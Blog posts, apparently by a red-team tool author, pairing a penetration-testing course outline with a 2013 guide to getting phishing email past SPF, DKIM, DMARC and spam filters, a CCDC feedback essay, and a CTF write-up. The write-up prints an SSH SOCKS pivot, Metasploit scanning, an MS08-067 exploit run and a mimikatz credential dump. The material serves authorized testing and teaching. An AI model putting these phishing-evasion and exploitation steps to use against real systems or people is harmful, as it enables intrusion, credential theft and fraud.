Basic Exploitation introduces the Metasploit Framework and how to use it through Cobalt Strike. I cover how to pick a remote exploit, brute force credentials, and pivot through SSH. I call this lecture “hacking circa 2003″ because remote memory corruption exploits have little use in an environment with a handle on patch management. Again, if you have strong Metasploit-fu, you may skip this lecture.

A few notes:

  • I dismiss remote memory corruption exploits as a dated vector; but don’t discount the remote attack surface. HD Moore and Val Smith‘s Tactical Exploitation is one of the best resources on how to extract information from exposed services. First published in 2007, it’s still relevant. Watch the video and read the paper.
  • I used the Metasploitable 2 Virtual Machine for the Linux demonstrations in this segment.

3. Getting a Foothold

This segment introduces how to execute a targeted attack with Cobalt Strike. We cover client-side attacks, reconnaissance, and crafting an attack package.

To go deeper into this material:

4. Social Engineering

The fourth installment of tradecraft covers how to get an attack package to a user. The use of physical media as an attack vector is explored as well as watering hole attacks, one off phishing sites, and spear phishing.

  • Watch Advanced Phishing Tactics by Martin Bos and Eric Milam. This talk puts together a lot of concepts needed for a successful phish. How to harvest addresses, develop a good pretext, and create a phishing site.
  • Advanced Threat actors favor spear phishing as an access vector. I’d point you to one source, but since this concept has such market buzz, there are a lot of whitepapers on this topic. I suggest a google search and reading something from a source you consider credible.

5. Post Exploitation with Beacon

By this time, you know how to craft and deliver an attack package. Now, it’s time to learn how to setup Beacon and use it for asynchronous and interactive operations.

6. Post Exploitation with Meterpreter

This video digs into interactive post-exploitation with Meterpreter. You will learn how to use Meterpreter, pivot through the target’s browser, escalate privileges, pivot, and use external tools through a pivot.

Privilege Escalation

7. Lateral Movement

This installment covers lateral movement. You’ll learn how to enumerate hosts and systems with built-in Windows commands, steal tokens, interrogate hosts to steal data, and use just Windows commands to compromise a fully-patched system by abusing trust relationships. My technical foundation is very Linux heavy, I wish this lecture existed when I was refreshing my skillset.

Token Stealing and Active Directory Abuse

Recovering Passwords 

Pass the Hash

8. Offense in Depth

This segment dissects the process to get a foothold into the defenses you’ll encounter. You’ll learn how to avoid or get past defenses that prevent message delivery, prevent code execution, and detect or stop command and control.

Email Delivery

Anti-virus Evasion

  • If you like, you may use Cortana to force Armitage or Cobalt Strike to use an AV-safe executable of your choosing. You have the option to select an EXE with Cobalt Strike’s dialogs. This process allows you to automate the process of generating a new automatically for your payload parameters.
  • Also, check out Veil, a framework for generating anti-virus safe executables.
  • Here’s a blog post by funoverip.net on how to modify a client-side exploit to get past an anti-virus product

Payload Staging

Offense in Depth

9. Operations

This last chapter covers operations. Learn how to collaborate during a red team engagement, manage multiple team servers from one client, and load scripts to help you out.

Labs

The online course does not have dedicated labs per se. I have two sets of labs I run through with this material.

When I’m hired to teach, I bring a Windows enterprise in a box. I have my students conduct several drills to get familiar with the tools. I then drop them into my enterprise environment and assign goals for them to go through.

I also have a DVD with labs that map to the old version of this course. This DVD has two Linux target virtual machines and an attack virtual machine. Nothing beats setting up a Windows environment to play with these concepts, but this DVD isn’t a bad starter. If you see me at a conference, ask for one.

h1

Email Delivery – What Pen Testers Should Know

October 3, 2013

I get a lot of questions about spear phishing. There’s a common myth that it’s easy to phish. Start a local mail server and have your hacking tool relay through it. No thinking required.

Not quite. Email is not as open as it was ten years ago. Several standards exist to improve the security of email delivery and deter message spoofing. Fortunately–these standards are a band-aid at best. They’re not evenly implemented across all networks and with a little knowledge of how the system works–you can avoid triggering these protections.

SMTP

SMTP is the Simple Mail Transfer Protocol. It’s one of the oldest internet protocols still in use. This is the protocol mail servers use to relay email to each other. SMTP runs on port 25.

Each domain that receives email has a mail server designated to receive these messages. A domain owner designates this mail server through an MX or mail exchanger record in its DNS zone file.

Anyone may query a domain’s MX record to find the server that receives email. Here’s how to do it with dig:

# dig +short MX gmail.com
5 gmail-smtp-in.l.google.com.
10 alt1.gmail-smtp-in.l.google.com.
40 alt4.gmail-smtp-in.l.google.com.
30 alt3.gmail-smtp-in.l.google.com.
20 alt2.gmail-smtp-in.l.google.com.

From the query above, we can see that gmail.com accepts mail through these five servers. Anyone in the world may connect to one of these servers on port 25 and attempt to relay a message to a gmail.com user.

The SMTP protocol is easy to work with (S stands for Simple, right?) Here’s what an SMTP exchange looks like:

# telnet 192.168.95.187 25
Trying 192.168.95.187...
Connected to 192.168.95.187.
Escape character is '^]'.
220 mint ESMTP Sendmail 8.14.3/8.14.3/Debian-9.1ubuntu1; Thu, 3 Oct 2013 15:37:30 -0400
     ; (No UCE/UBE) logging access from: [192.168.95.210](FAIL)-[192.168.95.210]
HELO strategiccyber.com
250 mint Hello [192.168.95.210], pleased to meet you
MAIL FROM: <raffi@strategiccyber.com>
250 2.1.0 <raffi@strategiccyber.com>... Sender ok
RCPT TO: <user@mint>
250 2.1.5 <user@mint>... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
From: "The Dude" <dude@lasvegas>
To: "Lou User" <user@mint>
Subject: Haaaaaay!
This is message content.
.
250 2.0.0 r93JbUN2002491 Message accepted for delivery
QUIT
221 2.0.0 mint closing connection
Connection closed by foreign host.

The HELO and EHLO command starts a conversation with the mail server. The HELO message does nothing. The EHLO message asks the mail server to list its abilities. This information tells the SMTP client whether or not a feature (such as STARTTLS) is supported.

The MAIL FROM command tells the mail server who sends this message. This is akin to a return address on an envelope. If a mail server encounters an error it will send a non-delivery notice to the sender. This value is not part of the message the user sees.

The RCPT TO command tells the mail server who to deliver the message to. This information does not need to match the email headers themselves. This value is not part of the message the user sees.

DATA tells the mail server that we’re ready to send the message. The mail server will assume that anything after DATA is message content. This message content will contain the headers and encoded content that the user receives. An SMTP client sends a single period to end this part of the conversation.

If all goes right, the mail server will return a message id and state that the message is in the queue. When the user receives our message, here’s what they see:

whatusersees

Message Content

This blog post focuses on SMTP and I consider a full discussion of email messages and their format out of scope for this post. In short though, a message consists of content and headers.

Headers tell the mail reader who the message is from, who it is to, its subject, and other information. Here are a few typical headers:

From: "Raphael Mudge" <rsmudge@gmail.com>
To: "Scumbag Sales People" <sales@strategiccyber.com>
Subject: Do you do reseller discounts?

SMTP is a plaintext protocol. All email is sent as ASCII text. There are ways to encode binary attachments and rich content messages. For our purposes, message content follows the headers. We can skip the message encoding and specify a message as-is:

Dear Sales Team,
I have a client that wants to buy your software. I will issue a purchase order no 
matter what your reply is. Do you offer reseller discounts?

Thanks

Purchasing Person

Now that you know what a message looks like, I suggest that you open a terminal and try to send yourself a message by hand. Look up your email domain’s SMTP server with the dig command. Use telnet or nc to connect to port 25 of the mail server. Go through the HELO, MAIL FROM, RCPT TO, and DATA steps. Paste in a message. Type period. Press enter twice. Wait one minute. Then go check your email.

If your message ends up in your spam folder–read the rest of this post for reasons why.

Who connects to SMTP servers?

Mail servers cater to two types of users.

Mail servers receive connections from systems that want to relay a message to a user in the mail server’s domain. If I run a mail server for foobar.com, I must accept that anyone, anywhere on the internet, may connect to me to relay a message to a foobar.com user.

This last statement is important–Any system on the internet may connect to a mail server to relay a message to one of its users. This system does not have to be a mail server.

The RCPT TO command indicates who the message is for. If the mail server is an open relay it will accept a message for anyone and relay it to their server. Open relays are rare now because spammers abuse(d) them so much. Most likely the mail server is not an open relay. You will need to specify a user in the mail server’s domain when you use RCPT TO.

Mail servers must also cater to authorized users who want to send messages. An authorized user may provide any address for RCPT TO and the mail server will queue it for delivery.

How does one become an authorized user? It depends on the server. Some servers will assume you’re authorized based on the address you connect from. Others will require you to authenticate before they will relay email for you.

Message Rejection

With all of that background out of the way–let’s talk about reasons why a mail server may reject your message. There are quite a few.

The MAIL FROM message indicates who the message is from. If I connect to a mail server and I claim to have a message from one of its users–the mail server will likely reject it. If I am relaying a message to a user on the mail server’s domain, I must claim the message is from a user on another domain.

Some mail servers will reject messages from a system with an internet address that does not resolve to a fully qualified domain name.

If your IP address is associated with an internet blacklist–expect mail servers to reject messages from you. For example, when I try to send a message through a tethered internet connection:

# telnet mta6.am0.yahoodns.net 25
Trying 63.250.192.45...
Connected to mta6.am0.yahoodns.net.
Escape character is '^]'.
553 5.7.1 [BL21] Connections will not be accepted from 97.165.90.119, because the ip
      is in Spamhaus's list; see http://postmaster.yahoo.com/550-bl23.html
Connection closed by foreign host.

Sender Policy Framework

When I connect to a mail server and send the MAIL FROM command–I am claiming the message is from the address I provide. By default, SMTP does not have a way to verify this statement. It takes what I say at face value.

Sender Policy Framework (or SPF) is a standard to verify this statement. To take advantage of SPF, the owner of a domain creates a DNS TXT record that states which hosts may send email for their domain.

When I connect to a mail server and try to relay a message–the mail server has the opportunity to check the SPF record of the domain I claim the message is from in the MAIL FROM command. If an SPF record exists and my IP address is not in the record–the mail server may reject my message. SPF does not verify the message’s From header.

It takes two for SPF to work. The mail server that receives a message must verify the SPF record. The domain owner must create an SPF record as well. Without both of these elements in place, there is no protection.

To lookup the SPF record for a domain, use:

# dig +short TXT wordpress.com
"v=spf1 ip4:192.0.80.0/20 ip4:72.232.146.117/32 ip4:76.74.254.15/32 
 ip4:72.233.119.192/26 ip4:66.155.9.88/32 a mx ?all"

DKIM

SPF does not verify message content. DKIM is the standard to verify message content. DKIM is DomainKeys Identified Mail. This is a mechanism for a mail server to sign a message and its contents to confirm that it originated from that server. The signature is added to a message as a DKIM-Signature header.

The DKIM-Signature header is added to a message by a mail server. The DKIM header includes the domain the message is signed for. Another mail server may query the domain’s public key (via DNS) and verify that the message originated from that domain.

By itself, DKIM has no teeth. The lack of a DKIM header does not mean a message is valid or invalid. Large webmail providers, like Google, have made deals with owners of highly phished domains to check for a DKIM signature and spam a message if it’s not present or verifiable. This protection requires tight cooperation between a domain owner and a mail provider.

DMARC

Tight cooperation between all email receivers and senders is not a tractable solution to stop email spoofing. Domain-based Message Authentication, Reporting and Conformance (or DMARC) is a standard that allows a domain owner to signal that they use DKIM and SPF. DMARC also allows a domain owner to advise other mail servers about what they should do when a message fails a check.

To check if a domain uses DMARC, use dig to lookup a TXT record for _dmarc.domain.com:

$ dig +short TXT _dmarc.gmail.com
 "v=DMARC1\; p=none\; rua=mailto:mailauth-reports@google.com"

Check if the domain you will send a message from uses DMARC before you phish. Remember, DMARC only works if the mail server that receives the message checks for the record and acts on it.

Much like SPF, DMARC requires a domain owner to opt-in to the protection. If they don’t, there is no protection against spoofing. Likewise, if a mail server does not check for DMARC, SPF, or DKIM there is no protection for the users on that domain either.

Accepted Domains

Without DMARC, SPF, and DKIM it’s difficult to discard a message as a spoof. There’s one exception to this. Your client should have a good handle on which domains they own. They should also have protections in place to prevent an outsider (you) from emailing their users with a message that spoofs their domain.

One mechanism to stop outsider’s spoofing a local user is the Accepted Domains feature in Microsoft Exchange. If you can spoof your customer’s domain as an external actor through their mail server–I would consider this a finding.

Spam Traps

Let’s say your message gets through the initial checks. It’s still at risk of finding its way to the spam folder. Different mail servers and tools check a lot of factors to decide if a message is spam or dangerous. Here are a few to think about:

  • How old is the domain you’re phishing from? If you send a phish from a domain registered last week–it’s possible a mail server may flag it as spam. Older domains are more trustworthy.
  • Does your message contain a link to an IP address? Sometimes a link to an IP address looks suspicious.
  • Does your message link to a URL with a different URL? For example–does your message contain a link that looks like this:
    <a href="http://www.yahoo-iphishyou.com">http://www.yahoo.com</a>

    This is suspicious.

  • Pay attention to your attachment. Most mail servers block known executable files (e.g., .exe, .pif, .scr, etc.) out of the box. Suspicious attachments won’t help your spam score.
  • Make sure your message content is not broken. Missing HTML close tags, missing headers, and other errors are potential signs of spam. I prefer to repurpose an existing email message for my phishes. An email client does a better job generating valid messages than a hacking tool ever will.
  • Check that your MAIL FROM address matches the email in the From header in your message. Some webmail providers will flag your message as spam if these values do not match. You may not have the same problem with corporate email infrastructure.

Circumventing Defenses

So far, in this post, I’ve raised your awareness of message delivery, how it works, and what stops it. If you’re planning to spoof a message from another domain:

  • Check if the domain has an SPF, DMARC, or DKIM record. The mail server that receives your phish has to verify these records–but if they don’t exist, there’s nothing for it to verify
  • Try to send your message to an inbox you control through email infrastructure that is similar to your clients. For example, many corporations use Outlook and Exchange. Microsoft Outlook has its own junk filter. Email yourself at your corporate address to see how Microsoft’s junk filter processes your message content.
  • Reconnaissance is your friend. Send a message to a non-existent user at the domain you’re trying to send a phish to. Make sure MAIL FROM is an address that you control. If you’re lucky, you will get a non-delivery notice. Inspect the headers from the non-delivery notice to see your spam score, SPF score, and other indicators about your message. If you get a non-delivery notice–it’s likely that your message passed other pre-delivery checks (a local junk filter may still send your message to the spam folder though).

For Cobalt Strike users, here’s how this advice maps to the built-in spear phishing tool:

phishingpractices

If all else fails–go legitimate. There’s no hard requirement that you must phish from a spoofed domain. Try to register a phishing domain that relates to a generic pretext. Create the proper SPF, DKIM, and DMARC records. Use this domain when you need something that looks legitimate. There’s nothing wrong with this approach–so long as your message makes it to the target user and it gets clicks.

Finally, don’t get discouraged when you can’t get a spoofed message to your Gmail account. Large webmail providers are early adopters and consumers of standards such as DKIM, SPF, and DMARC. It’s possible that your corporate pen testing client hasn’t heard of this stuff. Once you complete a successful phishing engagement–you can suggest these things in your report.

h1

Telling the Offensive Story at CCDC

May 30, 2013

The 2013 National CCDC season ended in April 2013. One topic that I’ve sat on since this year’s CCDC season ended is feedback. Providing meaningful and specific feedback on a team-by-team basis is not easy. This year, I saw multiple attempts to solve this problem. These initial attempts instrumented the Metasploit Framework to collect as many data points as possible into a central database. I applaud these efforts and I’d like to add a few thoughts to help them mature for the 2014 season.

Instrumentation is good. It provides a lot of data. Data is good, but data is dangerous. Too much data with no interpretation is noise. As there are several efforts to collect data and turn it into information, I’d like to share my wish list of artifacts that I’d like to see students get at the end of a CCDC event.

1) A Timeline

A timeline should capture red team activity as a series of discrete events. Each event should contain:

  • An accurate timestamp
  • A narrative description of the event
  • Information to help positively identify the activity (e.g., the red IP address)
  • The blue asset involved with the event

A complete timeline is valuable as it allows a blue team to review their logs and understand what they can and can’t observe. If they’re able to observe activity, but didn’t act on an event, then the team knows they have an operational issue with how they consume and act on their data.

If a team can’t find a red event in their logs, then they have a blind spot and they need to put in place a solution to close this gap.

In a production environment, the blue team has access to their logs on a day-to-day basis. In an exercise, the blue team only has access to the exercise network during the exercise. I recommend that blue teams receive a red team timeline and that they also get time after the competition to export their logs for review during the school year.

These red and blue log artifacts would provide blue teams a great tool to understand, on their own, how they can improve. Access to these artifacts would also allow students to learn log analysis and train throughout the year with real data.

Cobalt Strike’s activity report is a step in this direction. It interprets data from the Metasploit Framework and data collected by Cobalt Strike to create a timeline and capture this information. There are a few important linkages missing though. For example, if a compromised system connects to a stand-alone handler/listener, there is no information to associate that new session with the behavior that led to it (e.g., did someone task a Beacon? did the user click on a client-side attack? etc.).

2) An Asset Report

An asset report describes, on an asset-by-asset basis, how the red team views the asset and what they know about it.

Most penetration testing tools offer this capability. Core Impact, Metasploit Pro, and Cobalt Strike generate reports that capture all known credentials, password hashes, services, vulnerabilities, and compromises on a host-by-host basis.

These reports work and they are a great tool for a blue team to understand which systems are their weakest links.

A challenge with these reports is that a CCDC red team does not use a single system to conduct activity. Some red tea members run attack tools locally, others connect to multiple team servers to conduct different aspects of the engagement. Each system has its own view of what happened during the event. I’m taking steps to manage this problem with Cobalt Strike. It’s possible to connect to multiple team servers and export a report that intelligently combines the point of view of each server into one picture.

I saw the value of the asset report at Western Regional CCDC. I spent the 2-3 hour block of networking time going over Cobalt Strike’s hosts report with different blue teams. Everyone wanted me to scroll through their hosts. In the case of the winning team, I didn’t have to say anything. The students looked at their report, drew their conclusions, and thanked me for the helpful feedback. The hosts report gave the blue teams something concrete to judge whether they were too complacent or too paranoid. Better, this information helped them understand how close we were to making things much worse for them.

Whether this type of report comes from a penetration testing tool or these competition-specific solutions under development, I recommend that red teams provide an asset-by-asset report. The students I interacted with were able to digest this information quickly and use it to quickly answer some of their open questions.

3) A Vulnerability Report

During a CCDC event, the red team only uses one or two exploits to get a toehold. We then leverage credentials for the rest of the event. Still, I’m often asked “which exploits did you use?” A report of which vulnerabilities were used will answer these questions.

4) A Narrative

The item that completes the feedback is the narrative. The narrative is the red team member telling the story of what they did at a very high level. A short narrative goes a long way to bring life to the data the blue team will have to sift through later.

I believe telling stories is something CCDC red teams do well. At a typical CCDC debrief, red team members will share their favorite moments or wins during the event. Without context, this story is anecdotal. Combined with the data above, it’s something actionable. Now the blue teams know what they should look for when they’re analyzing the log files.

The narrative provides blue teams with a starting point to understand what happened. The data we provide them will give them the opportunity to take that understanding to the next level.

5) Sizzle

During a security assessment, I’m not doing my job if I just explain what I did. It’s my job to ally with my blue counterparts and actively sell our client’s leadership on the steps that will improve their security posture. When communication with non-technical folks, a little sizzle goes a long ways. I like to record my screen during an engagement. At the end of the engagement, I cut the interesting events from the recording and create short videos to show the high points. Videos make it easier to understand the red perspective. If a video involves an event that both the red team and blue team experienced together, I find watching the video together creates a sense of a shared experience. This can go a long way towards building rapport (a key ingredient in that building an alliance step).

To record my screen, I use ScreenFlow for MacOS X. 20 hours of screen recording (no audio) takes up a few gigabytes, nothing unreasonable.

In this post, I listed five artifacts we can provide blue teams to better tell the offensive story. I’ve pointed at examples where I could. Beware though, if actionable feedback were as easy as clicking a button to generate a report, this blog post wouldn’t exist. Reporting is challenging in an environment where 20 experts are actively participating in 10 engagements with multiple toolkits. As different parties build data collection platforms, I hope to see an equal effort towards data interpretation. These artifacts are some of the things I’d like to see come out of the data. What artifacts do you think would help?

h1

Goading Around Firewalls

May 22, 2013

Last weekend, I was enjoying the HackMiami conference in beautiful Miami Beach, FL. On Sunday, they hosted several hacking challenges in their CTF room. One of the sponsoring vendors, a maker of network security appliances setup a challenge too. The vendor placed an unpatched Windows XP device behind one of their unified threat management devices. The rules were simply: they would allow all traffic inbound and outbound, through a NAT, with their intrusion prevention technology turned on. They were looking for a challenger who could exploit the Windows XP system and get positive command and control without their system detecting it.

thegame

I first heard about this challenge from an attendee who subjected me to some friendly goading. “You wrote a custom payload, your tools should walk right through it”. Not really. Knowing the scenario, my interest in participating was pretty low. I can launch a known implementation of ms08_067_netapi through an Intrusion Prevention Device, but to what end? I fully expected the device to pick it up and squash my connection. The Metasploit Framework has a few evasion options (type show evasion, the next time you configure a module), but I expected limited success with them.

The representatives from the vendor were pretty cool, so I opted to sit down and see what they had. The vendor rep told me the same network also had a Metasploitable Virtual Machine. This immediately made life better. My first act was to try to behave like a legitimate user and see if it works. If legitimate traffic can’t go through, then there’s little point trying a hacking tool.

I ran ssh and I was able to login with one of the known weak accounts against the Metasploitable Virtual Machine. Funny enough, this was a painful act. One person thought they could get past the device by attempting a Denial of Service, hoping to make it fail open by default. Another person wanted to further everyone’s learning and decided to ARP poison the network. Narrowing down these hostile factors took some time away from the fun.

A static ARP entry later and I was ready to try the challenge again. I’ve written about tunneling attacks through SSH before, but the technique is so useful, I can’t emphasize it enough.

First, I connected to the Metasploitable Linux system using the ssh command. The -D flag followed by a port number allows me to specify which port to set up a local SOCKS proxy server on. Any traffic sent through this local SOCKS proxy will tunnel through the SSH connection and come out through the SSH host.

ssh -D 1080 user@6.6.6.98

Next, I had to instruct the Metasploit Framework to send its traffic through this SOCKS proxy server. Again, easy enough. I opened a Metasploit Framework console tab and typed:

setg Proxies socks4:127.0.0.1:1080

The setg command globally sets an option in the Metasploit Framework. This is useful for Armitage and Cobalt Strike users. With setg, I can set this option once, and modules I launch will use it.

Finally, I had to find my target. The vendor had setup a private network with the target systems. I typed ifconfig on the Metasploitable system to learn about its configuration. I then ran auxiliary/scanner/smb/smb_version against the private network Metasploitable was on.

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set THREADS 24
THREADS => 24
msf auxiliary(smb_version) > set SMBDomain WORKGROUP
SMBDomain => WORKGROUP
msf auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(smb_version) > run -j
[*] Auxiliary module running as background job
[*] Scanned 049 of 256 hosts (019% complete)
[*] Scanned 062 of 256 hosts (024% complete)
[*] Scanned 097 of 256 hosts (037% complete)
[*] 192.168.1.111:445 is running Windows 7 Professional 7601 Service Pack (Build 1) (language: Unknown) (name:FGT-XXXX) (domain:WORKGROUP)
[*] 192.168.1.113:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] 192.168.1.112:445 is running Windows XP Service Pack 3 (language: English) (name:XXXX-44229FB) (domain:WORKGROUP)
[*] Scanned 119 of 256 hosts (046% complete)
[*] Scanned 143 of 256 hosts (055% complete)
[*] Scanned 164 of 256 hosts (064% complete)
[*] Scanned 191 of 256 hosts (074% complete)
[*] Scanned 215 of 256 hosts (083% complete)
[*] Scanned 239 of 256 hosts (093% complete)
[*] Scanned 256 of 256 hosts (100% complete)

Once I discovered the IP address of the Windows XP system, I was able to launch exploit/windows/smb/ms08_067_netapi through my SSH proxy pivot. This, in effect, resulted in the exploit coming from the Metasploitable system on the same private network as the Windows XP target. I used a bind payload to make sure Meterpreter traffic would go through the SSH proxy pivot as well.

tunneling

At this point, I had access to the Windows XP system and I was able to take a picture of the vendor with his webcam and use mimikatz to recover the local password. Still undetected.

meterpreter > use mimikatz
Loading extension mimikatz...success.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
[*] wdigest credentials
===================

AuthID   Package    Domain           User              Password
------   -------    ------           ----              --------
0;999    NTLM       WORKGROUP        XXXX-44229FB$
0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE
0;54600  NTLM
0;996    Negotiate  NT AUTHORITY     NETWORK SERVICE
0;62911  NTLM       XXXX-44229FB     Administrator     password123!

There’s a lesson here. Don’t attack defenses, go around them.

Follow

Get every new post delivered to your Inbox.

Join 11,412 other followers